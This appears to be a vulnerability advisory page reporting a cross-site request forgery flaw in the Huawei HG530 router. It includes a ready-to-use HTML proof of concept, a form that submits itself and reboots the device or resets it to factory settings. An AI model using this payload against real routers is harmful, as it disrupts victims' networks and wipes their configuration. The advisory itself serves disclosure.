Huawei HG530 Cross Site Request Forgery

2019.07.08

Credit: Raki Ben Hamouda

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-352

Multiple CSRF reboot and restore Vulnerability

===========================

The Huawei HG530 suffers from multiple CSRF vulnerability allows local
attackers to reboot the device or to restore to factory Configuration.

==================

The vulnerability is located in form POST data parameter in
'Restart_factory' via path '/Forms/bottom_restart_1'

====================

Security issue PoC :

<html>

<FORM METHOD="POST" ACTION="http://192.168.1.1/Forms/bottom_restart_1"
id='test' >

<input type="hidden" name="defaltRomFlag" value="0">

<input type="hidden" name="defaultIpFactory" value="192.168.1.1">

<INPUT TYPE="hidden" NAME="Restart_factory" VALUE="1">

</form>

<script>

document.getElementById('test').submit();

</script>

</html>

//Change Value of 'Restart_factory' to 1 (to restore) or 0 to reboot

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Huawei HG530 Cross Site Request Forgery

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.